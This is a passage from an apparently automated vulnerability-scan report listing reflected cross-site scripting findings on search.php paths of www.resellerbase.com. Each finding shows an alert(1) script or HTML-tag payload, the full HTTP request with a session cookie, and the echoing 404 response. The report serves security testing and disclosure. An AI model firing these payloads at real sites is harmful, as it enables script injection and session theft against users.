The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 745f4<script>alert(1)</script>9dd7e529eb5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating745f4<script>alert(1)</script>9dd7e529eb5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating745f4<script>alert(1)</script>9dd7e529eb5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1525. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 79785<script>alert(1)</script>2eb60dd8faf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/search.php79785<script>alert(1)</script>2eb60dd8faf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php79785<script>alert(1)</script>2eb60dd8faf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1526. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3e9ef<a>ae54d6de9e3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e9ef<a>ae54d6de9e3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e9ef<a>ae54d6de9e3&opt=2 was not found on this server.</p>
...[SNIP]...

2.1527. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5a9ce<a>f6a18b3b92 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...5a9ce<a>f6a18b3b92&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...5a9ce<a>f6a18b3b92&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1528. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload afef5<script>alert(1)</script>549f992c7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&afef5<script>alert(1)</script>549f992c7c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&afef5<script>alert(1)</script>549f992c7c8=1 was not found on this server.</p>
...[SNIP]...

2.1529. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 77b37<a>ad190333e95 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=277b37<a>ad190333e95 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=277b37<a>ad190333e95 was not found on this server.</p>
...[SNIP]...

2.1530. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99936<script>alert(1)</script>8695d18aec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail99936<script>alert(1)</script>8695d18aec5/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail99936<script>alert(1)</script>8695d18aec5/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1531. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce1e3<script>alert(1)</script>063129b0146 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18ce1e3<script>alert(1)</script>063129b0146/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18ce1e3<script>alert(1)</script>063129b0146/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1532. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eec7<script>alert(1)</script>843c5c48a21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes9eec7<script>alert(1)</script>843c5c48a21/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes9eec7<script>alert(1)</script>843c5c48a21/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1533. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b2c1<script>alert(1)</script>3a514912ed0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos4b2c1<script>alert(1)</script>3a514912ed0/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos4b2c1<script>alert(1)</script>3a514912ed0/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1534. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b490b<script>alert(1)</script>d576158e140 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/imagesb490b<script>alert(1)</script>d576158e140/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/imagesb490b<script>alert(1)</script>d576158e140/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1535. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 79b0d<script>alert(1)</script>ee4b9114014 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/search.php79b0d<script>alert(1)</script>ee4b9114014?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php79b0d<script>alert(1)</script>ee4b9114014?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1536. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4283d<a>e60f9ac36be was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4283d<a>e60f9ac36be&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4283d<a>e60f9ac36be&opt=2 was not found on this server.</p>
...[SNIP]...

2.1537. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b08e2<a>ca75dd32d48 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...b08e2<a>ca75dd32d48&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...b08e2<a>ca75dd32d48&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1538. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9e0ce<script>alert(1)</script>8504eb46b08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9e0ce<script>alert(1)</script>8504eb46b08=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9e0ce<script>alert(1)</script>8504eb46b08=1 was not found on this server.</p>
...[SNIP]...

2.1539. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6c883<a>0bafeb9ddac was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26c883<a>0bafeb9ddac HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26c883<a>0bafeb9ddac was not found on this server.</p>
...[SNIP]...

2.1540. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3485d<script>alert(1)</script>367a2be5661 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3485d<script>alert(1)</script>367a2be5661/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3485d<script>alert(1)</script>367a2be5661/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1541. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35fcb<script>alert(1)</script>9ccdc8178ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1835fcb<script>alert(1)</script>9ccdc8178ba/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

